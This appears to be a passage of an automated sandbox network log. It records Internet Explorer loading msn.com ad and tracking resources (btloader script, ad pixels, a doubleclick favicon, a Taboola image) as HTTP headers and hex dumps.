                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC3INData Raw: 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 29 7d 76 61 72 20 75 2c 61 2c 64 2c 62 2c 6d 3b 75 3d 22 36 32 30 38 30 38 36 30 32 35 39 36 31 34 37 32 22 2c 61 3d 22 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 64 3d 22 61 70 69 2e 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 62 3d 22 32 2e 30 2d 34 2d 67 33 36 37 63 35 37 65 22 2c 6d 3d 22 22 3b 76 61 72 20 6f 3d 7b 22 6d 73 6e 2e 63 6f 6d 22 3a 7b 22 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 77 65 62 73 69 74 65 5f 69 64 22 3a 22 35 36 37 31 37 33 37 33 38 38 36 39 35 35 35 32 22 7d 7d 2c 70 3d 7b 74
                                                                                                                                                                                                                                  Data Ascii: ndow.document.documentElement).appendChild(e)})}var u,a,d,b,m;u="6208086025961472",a="btloader.com",d="api.btloader.com",b="2.0-4-g367c57e",m="";var o={"msn.com":{"content_enabled":true,"mobile_content_enabled":false,"website_id":"5671737388695552"}},p={t
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC5INData Raw: 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 29 26 26 28 74 3d 21 30 2c 77 2e 77 65 62 73 69 74 65 49 44 3d 6f 5b 6e 5d 2e 77 65 62 73 69 74 65 5f 69 64 2c 77 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 2c 77 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 29 3b 74 7c 7c 28 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 2f 2f 22 2b 64 2b 22 2f 6c 3f 65 76 65 6e 74 3d 75 6e 6b 6e 6f 77 6e 44 6f 6d 61 69 6e 26 6f 72 67 3d 22 2b 75 2b 22 26 64 6f 6d 61 69 6e 3d 22 2b 65 29 7d 28 29 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 74 61 67 5f 64 3d 7b 6f 72 67 49 44 3a 75 2c 64 6f 6d 61 69 6e 3a 61 2c
                                                                                                                                                                                                                                  Data Ascii: n.toLowerCase()))&&(t=!0,w.websiteID=o[n].website_id,w.contentEnabled=o[n].content_enabled,w.mobileContentEnabled=o[n].mobile_content_enabled);t||((new Image).src="//"+d+"/l?event=unknownDomain&org="+u+"&domain="+e)}(),window.__bt_tag_d={orgID:u,domain:a,
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC6INData Raw: 62 75 6e 64 6c 65 73 29 7b 76 61 72 20 6c 3d 6e 2c 73 3d 31 2d 6e 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 63 2e 62 75 6e 64 6c 65 73 29 2e 73 6f 72 74 28 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 63 2e 62 75 6e 64 6c 65 73 5b 65 5d 3b 72 5b 65 5d 3d 7b 6d 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 6c 2b 73 2a 6f 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 6c 2b 73 2a 28 6f 2b 74 29 29 29 7d 2c 6f 2b 3d 74 7d 29 7d 76 61 72 20 75 3d 74 5b 65 5d 3b 69 66 28 6e 75 6c 6c 21 3d 75 26 26 75 2e 62 75 6e 64 6c 65 73 29 7b 76 61 72 20 64 3d 6e 2b 28 31 2d 6e 29 2a 6f 2c 62 3d 28 31 2d 6e 29 2a 28 31 2d 6f 29 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 75 2e 62 75 6e 64 6c 65 73 29 2e 73 6f
                                                                                                                                                                                                                                  Data Ascii: bundles){var l=n,s=1-n;Object.keys(c.bundles).sort().forEach(function(e){var t=c.bundles[e];r[e]={min:Math.trunc(100*(l+s*o)),max:Math.trunc(100*(l+s*(o+t)))},o+=t})}var u=t[e];if(null!=u&&u.bundles){var d=n+(1-n)*o,b=(1-n)*(1-o);Object.keys(u.bundles).so
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC7INData Raw: 31 30 31 35 30 38 35 32 36 37 33 35 33 36 2c 22 62 75 6e 64 6c 65 73 22 3a 7b 22 35 37 31 30 31 35 30 38 35 32 36 37 33 35 33 36 22 3a 31 7d 7d 7d 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 69 6e 74 72 6e 6c 3d 7b 74 72 61 63 65 49 44 3a 70 2e 74 72 61 63 65 49 44 7d 3b 74 72 79 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 72 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 6e 2c 6f 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 77 69 74 63 68 28 65 2e 6c 61 62 65 6c 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 61 6c 72 65 61 64 79 5f 69 6e 76 6f 6b 65 64 7c 7c 21 77 2e 77 65 62 73 69 74 65 49 44 3f 5b 32 5d 3a 28 77 69 6e 64 6f
                                                                                                                                                                                                                                  Data Ascii: 10150852673536,"bundles":{"5710150852673536":1}}},window.__bt_intrnl={traceID:p.traceID};try{!function(){r(this,void 0,void 0,function(){var t,n,o;return i(this,function(e){switch(e.label){case 0:return window.__bt_already_invoked||!w.websiteID?[2]:(windo
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC9INData Raw: 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 29 2c 77 2e 77 65 62 73 69 74 65 49 44 26 26 77 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 26 26 28 21 28 6e 3d 2f 28 61 6e 64 72 6f 69 64 7c 62 62 5c 64 2b 7c 6d 65 65 67 6f 29 2e 2b 6d 6f 62 69 6c 65 7c 61 76 61 6e 74 67 6f 7c 62 61 64 61 5c 2f 7c 62 6c 61 63 6b 62 65 72 72 79 7c 62 6c 61 7a 65 72 7c 63 6f 6d 70 61 6c 7c 65 6c 61 69 6e 65 7c 66 65 6e 6e 65 63 7c 68 69 70 74 6f 70 7c 69 65 6d 6f 62 69 6c 65 7c 69 70 28 68 6f 6e 65 7c 6f 64 29 7c 69 72 69 73 7c 6b 69 6e 64 6c 65 7c 6c 67 65 20 7c 6d 61 65 6d 6f 7c 6d 69 64 70 7c 6d 6d 70 7c 6d 6f 62 69 6c 65 2e 2b 66 69 72 65 66 6f 78 7c 6e 65 74 66 72 6f 6e 74 7c 6f 70 65 72 61 20 6d 28 6f 62 7c 69 6e 29 69 7c 70 61 6c 6d 28 20 6f 73 29 3f 7c 70 68
                                                                                                                                                                                                                                  Data Ascii: bileContentEnabled),w.websiteID&&w.contentEnabled&&(!(n=/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|ph
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC10INData Raw: 30 28 30 7c 31 29 7c 31 30 29 7c 6e 65 28 28 63 7c 6d 29 5c 2d 7c 6f 6e 7c 74 66 7c 77 66 7c 77 67 7c 77 74 29 7c 6e 6f 6b 28 36 7c 69 29 7c 6e 7a 70 68 7c 6f 32 69 6d 7c 6f 70 28 74 69 7c 77 76 29 7c 6f 72 61 6e 7c 6f 77 67 31 7c 70 38 30 30 7c 70 61 6e 28 61 7c 64 7c 74 29 7c 70 64 78 67 7c 70 67 28 31 33 7c 5c 2d 28 5b 31 2d 38 5d 7c 63 29 29 7c 70 68 69 6c 7c 70 69 72 65 7c 70 6c 28 61 79 7c 75 63 29 7c 70 6e 5c 2d 32 7c 70 6f 28 63 6b 7c 72 74 7c 73 65 29 7c 70 72 6f 78 7c 70 73 69 6f 7c 70 74 5c 2d 67 7c 71 61 5c 2d 61 7c 71 63 28 30 37 7c 31 32 7c 32 31 7c 33 32 7c 36 30 7c 5c 2d 5b 32 2d 37 5d 7c 69 5c 2d 29 7c 71 74 65 6b 7c 72 33 38 30 7c 72 36 30 30 7c 72 61 6b 73 7c 72 69 6d 39 7c 72 6f 28 76 65 7c 7a 6f 29 7c 73 35 35 5c 2f 7c 73 61 28 67 65
                                                                                                                                                                                                                                  Data Ascii: 0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  2192.168.2.749748104.26.2.70443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC11OUTGET /px.gif?ch=1&e=0.7442770494067928 HTTP/1.1
                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: ad-delivery.net
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC12INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:11:39 GMT
                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                  Content-Length: 43
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  X-GUploader-UploadID: ABg5-UzSZ-Kt1WbGdd88HlCnZf7YcJGLu-DR5tPwPS9bXoxAsvJYwt4jGn6LAHoZbG34sctt0vecv7iFCJZExLBCcbRvF7nEjw
                                                                                                                                                                                                                                  Expires: Fri, 10 Sep 2021 10:08:09 GMT
                                                                                                                                                                                                                                  Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                                                                                                                                                                                                  ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                                                                                                                                                                                  x-goog-generation: 1620242732037093
                                                                                                                                                                                                                                  x-goog-metageneration: 5
                                                                                                                                                                                                                                  x-goog-stored-content-encoding: identity
                                                                                                                                                                                                                                  x-goog-stored-content-length: 43
                                                                                                                                                                                                                                  x-goog-hash: crc32c=cpEfJQ==
                                                                                                                                                                                                                                  x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                                                                                                                                                                                                  x-goog-storage-class: MULTI_REGIONAL
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                                                                                                                                                                                                  Age: 210
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X8B8Eyboq76YxOr9D%2B%2Bpg6B4rEAQ701Xid%2FVxNGW%2Fm%2B3jZ7fWRkwKs3dUpdvUw%2BpRQQLaHSniCa66fIBtAt6sCldz1gk0jVViHNAOO8WZ8wON4caL6AmQetyGh3%2FzJygoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 68c787b848ca440d-FRA
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC13INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff
                                                                                                                                                                                                                                  Data Ascii: GIF89a
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC13INData Raw: 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                                  Data Ascii: !,L;


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  3192.168.2.749745172.217.19.102443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC13OUTGET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1
                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: ad.doubleclick.net
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Cookie: IDE=AHWqTUmLaOp9iEghuZm4P0dJw9hUfO3C-7WsvHHj8XxLUXDn8JvgU1zZASjuR4p3
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC13INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: image/x-icon
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Content-Length: 1078
                                                                                                                                                                                                                                  Date: Thu, 09 Sep 2021 21:17:38 GMT
                                                                                                                                                                                                                                  Expires: Fri, 10 Sep 2021 21:17:38 GMT
                                                                                                                                                                                                                                  Last-Modified: Tue, 08 May 2012 13:08:06 GMT
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: sffe
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Age: 42841
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC14INData Raw: 00 00 01 00 02 00 10 10 10 00 00 00 00 00 28 01 00 00 26 00 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 4e 01 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11
                                                                                                                                                                                                                                  Data Ascii: (& N(
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC15INData Raw: 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11
                                                                                                                                                                                                                                  Data Ascii:


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  4192.168.2.749776151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC15OUTGET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F07804453bf90da635cf952e3d393ab12.png HTTP/1.1
                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: img.img-taboola.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC17INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 23695
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                  edge-cache-tag: 610086439231269245217660850497464048231,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                                                                                                                                                                                                  etag: "fb1a38af3e936cc846bcce134fd77093"
                                                                                                                                                                                                                                  expiration: expiry-date="Thu, 09 Sep 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
                                                                                                                                                                                                                                  last-modified: Mon, 09 Aug 2021 14:28:18 GMT
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  x-ratelimit-limit: 101
                                                                                                                                                                                                                                  x-ratelimit-remaining: 100
                                                                                                                                                                                                                                  x-ratelimit-reset: 1
                                                                                                                                                                                                                                  x-envoy-upstream-service-time: 31
                                                                                                                                                                                                                                  X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb804
                                                                                                                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:11:43 GMT
                                                                                                                                                                                                                                  Age: 1618786
                                                                                                                                                                                                                                  X-Served-By: cache-wdc5568-WDC, cache-dca17725-DCA, cache-hhn4039-HHN
                                                                                                                                                                                                                                  X-Cache: HIT, MISS, HIT
                                                                                                                                                                                                                                  X-Cache-Hits: 1, 0, 1
                                                                                                                                                                                                                                  X-Timer: S1631265103.357958,VS0,VE1
                                                                                                                                                                                                                                  Vary: ImageFormat
                                                                                                                                                                                                                                  X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F07804453bf90da635cf952e3d393ab12.png
                                                                                                                                                                                                                                  X-vcl-time-ms: 1
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC18INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c 0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54 01 0a 0a 0a 0a 0b 0a 0c 0d 0d 0c 10 11 0f 11 10 18 16 14 14 16 18 24 1a 1c 1a 1c 1a 24 36 22 28 22 22 28 22 36 30 3a 2f 2c 2f 3a 30 56 44 3c 3c 44 56 64 54 4f 54 64 79 6c 6c 79 98 91 98 c7 c7 ff ff c2 00 11 08 01 37 00 cf 03 01 11 00 02 11 01 03 11 01 ff c4 00 36 00 00 02 02 03 01 01 01 01 00 00 00 00 00 00 00 00 06 07 04 05 03 08 09 02 00 01 0a 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e6 30 54 01 90 5d b5 88 6b 64 7b 0e
                                                                                                                                                                                                                                  Data Ascii: JFIF&""&0-0>>T$$6"(""("60:/,/:0VD<<DVdTOTdylly760T]kd{
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC19INData Raw: 35 21 8c df 39 77 cb 2c ec dc 68 db 86 b6 43 ce dc 53 48 3d ca 99 19 5d 9a 2c 83 1d 66 05 b4 18 48 af e9 cd 9f 6d 1f e8 b2 d2 99 9a e0 92 e6 e9 e4 df 47 21 de 1b d9 89 92 0e 9d 27 65 47 af 70 f4 7f 6c 44 40 da a7 e0 2a ce f7 43 ca ea 32 e6 ab 49 17 5b e6 6d 15 ed cc b4 ac 76 2f fa e5 79 db 11 26 d8 45 b0 2f 21 ac b6 e2 16 9c b2 c2 e8 0e 81 a4 33 80 02 04 70 84 40 d5 af 9a 34 8d 08 9a 0a b9 6d 72 68 cc 8a 8f 2c 4e 82 cd de c3 8e c9 a1 2a 8d 25 15 82 d9 d0 ca f9 bd 03 be 39 41 74 07 80 cd 19 a8 04 82 1c 54 ea 8f 47 05 cb ef 2d 8b aa 7f 05 60 c2 c0 03 05 a2 d1 c4 9e c6 c5 96 d4 58 eb 8e b0 0f 5a 56 96 45 b2 2f 9f 4f 66 19 a1 18 1b e0 1e 33 a0 03 04 50 9f 09 f4 6e 2c dd 55 88 c7 95 65 47 e0 f0 27 01 54 6d 16 a9 3c 9b b1 ab 3a f3 29 d7 1a 8a 8d 35 cb b9 08 6b
                                                                                                                                                                                                                                  Data Ascii: 5!9w,hCSH=],fHmG!'eGplD@*C2I[mv/y&E/!3p@4mrh,N*%9AtTG-`XZVE/Of3Pn,UeG'Tm<:)5k
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC20INData Raw: ca 8f 22 62 9c 43 23 11 44 e6 00 e5 aa 0d 93 28 77 1d 64 d8 89 7f ce 78 c9 03 90 7b 45 46 64 42 45 25 03 08 e8 a5 4b c8 ed 87 5c 48 30 39 46 2d df aa 98 06 2e a1 d3 f2 18 bc 80 10 a2 22 32 52 07 57 90 01 76 aa 82 38 e5 c2 ae dc 2a ba c6 92 3b 05 50 8e 3a 06 80 e3 99 22 0e 25 eb 26 c9 da a9 aa 07 14 e0 a2 23 99 2f 7a a9 36 52 0f e3 db a8 7f 70 10 c2 f9 01 0c d0 56 91 96 ad 43 b7 59 44 96 29 d9 80 8e 33 59 a3 29 d7 47 01 9e bd c6 44 32 39 96 5a b7 48 d9 16 81 17 cf 1a b1 d7 d0 11 a5 28 ae 71 64 dd 02 f6 a2 82 a8 07 9f 0a a0 1f d9 56 e0 1f b3 96 84 50 40 4d 8b b8 7c 52 08 26 6b b0 be 72 ed 32 bc 6d 06 d8 44 03 14 8d 3a a8 fb 4a 45 38 21 c4 40 14 8f 58 e3 c7 0a c1 aa 6f d8 84 63 2a b9 d2 3a 2a a4 a2 0a 9d 25 49 13 dc 94 6c ca f8 e4 3d 1a eb 22 80 c0 01 13 55
                                                                                                                                                                                                                                  Data Ascii: "bC#D(wdx{EFdBE%K\H09F-."2RWv8*;P:"%&#/z6RpVCYD)3Y)GD29ZH(qdVP@M|R&kr2mD:JE8!@Xoc*:*%Il="U
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC22INData Raw: b0 3f e2 a5 e3 24 12 05 63 54 0e 3a b9 96 91 bc f4 89 aa 2d 8b 1e 6f cc 71 f3 8f eb 3e 72 10 40 23 ca 23 9d 13 36 74 cf a6 b9 e5 17 45 54 71 54 b1 74 7e 07 69 20 20 65 51 f7 c7 6f 0a d5 c9 50 36 46 a0 b9 12 74 a3 0c 83 a8 48 be 54 15 51 93 38 88 4a e1 fd 49 3b 3c 0e c0 d7 35 59 12 4a 44 55 ac 5b 43 61 6c e7 60 e2 cf 32 dc c0 91 48 1d b7 d5 8c 10 ee 8c 52 ac 89 19 7a 2d 49 9b 2d 12 3d a4 8b 45 31 75 3b 9c 28 38 45 32 25 7f 4a 49 99 b3 a8 68 05 2a dd 43 6c b8 e5 47 ec fb f1 bf e7 b3 ab a3 81 ba 51 bb e2 be 5a 1c 33 44 55 e1 36 6f 46 b5 5a 8d 8f 37 06 ae bc 69 b9 97 15 9b 53 00 b2 43 8c 4f e3 e0 5f 49 ea 2b c6 ed 9a 46 b9 5a 69 17 59 80 a3 d5 20 69 95 d2 2a 96 2a 8e 5a 19 f1 6c d6 ce 83 15 47 36 12 c7 61 31 06 25 1a f3 a6 ed d1 45 45 8f 34 fe 41 5a d1 dd 16
                                                                                                                                                                                                                                  Data Ascii: ?$cT:-oq>r@##6tETqTt~i eQoP6FtHTQ8JI;<5YJDU[Cal`2HRz-I-=E1u;(8E2%JIh*ClGQZ3DU6oFZ7iSCO_I+FZiY i**ZlG6a1%EE4AZ
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC23INData Raw: 03 7d e1 0e af 11 f6 3f 96 99 34 dd 2a da 9f ae b5 14 fc 2c 15 be 6d fd f2 16 c2 83 68 fd 83 11 60 83 94 6c 44 db 5d 2b cf 35 73 0b fd 30 e3 57 bb ec c7 ed 6c 2e 61 d0 9d d5 0f 1b 1c fd 22 d7 10 b3 a9 b0 6b 37 a7 f4 2b 65 06 7d 07 ae 62 ac 57 58 63 c5 c7 51 35 a5 fe 1e a5 44 7f 0a 6a da d5 08 49 36 a5 ad 35 9d b2 d6 62 6c 22 6b d5 a4 fb 1e 42 cf 26 de 5a 5e f1 39 68 83 75 4f 81 96 bd 54 d7 98 95 95 b4 2d 3f 2a b4 e2 40 e1 9a 2b 62 ef 80 89 76 09 a5 04 7d 77 fe 1f 11 d2 20 ed ac 52 cc 4e 62 90 c2 6c 82 95 ab 53 75 04 0b 3b 6d 47 7c bb 8d b4 ea 1d 31 6f 8e 61 d4 0f 62 54 6d 22 41 14 b6 2c fe b1 e9 62 a3 31 0c de c4 91 50 85 70 52 1b 4a 4d 3d 81 be a0 e9 ab 8d 89 b0 a6 2c ad 50 64 0f f4 ff 00 52 13 74 24 09 5b b6 a8 bd 66 af 1c ce b3 73 d7 ad e1 46 ef 43 7d
                                                                                                                                                                                                                                  Data Ascii: }?4*,mh`lD]+5s0Wl.a"k7+e}bWXcQ5DjI65bl"kB&Z^9huOT-?*@+bv}w RNblSu;mG|1oabTm"A,b1PpRJM=,PdRt$[fsFC}
